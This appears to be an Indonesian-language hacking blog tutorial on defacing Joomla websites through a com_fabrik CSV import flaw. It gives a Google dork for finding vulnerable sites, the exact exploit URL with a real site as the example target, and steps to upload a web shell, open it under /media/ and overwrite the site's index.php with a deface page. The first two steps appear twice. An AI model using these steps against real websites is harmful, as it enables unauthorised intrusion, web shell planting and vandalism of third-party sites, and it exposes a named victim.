kali ini aku akan memberi tahu anda bagaimana cara mendeface web joomla dengan metode Exploit Joomla ( Com_Fabrik ). Walaupun ini merupakan cara usang untuk mendeface website, tapi tidak ada salahnya untuk mencoba.
Langkah-Langkah:
1. Cari sasaran dengan google dork ini
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Langkah-Langkah:
1. Cari sasaran dengan google dork ini
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Masukkan shell milik teman (Pilih File) dan kemudian klik tombol import CSV
4. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar diatas. kemudian masuk ke dalam shellnya.
www.site.com/media/nama shell kamu.php contoh: http://www.toidupada.ee/media/shell.php (Jika nama shell anda yakni shell)
*Jika berhasil, akan muncul tampilan shell milik anda. kalau tidak berhasil, berarti cari sasaran lain.
5. Klik pada goresan pena htdocs/public_html/lainnya sesuai dengan webnya (Tulisan kedua dari belakang).
*Setiap web tiidak selalu sama
6. Cari goresan pena yang bernama index.php lalu edit.
*Bukan index.html / lainnya
7. Hapus semua script web dan tempelkan script deface milikmu di index.php. kemudian tekan tombol save.
8. Jika save succes maka akan muncul script anda di halaman utama web target.
Sumber https://mrwho-404.blogspot.com/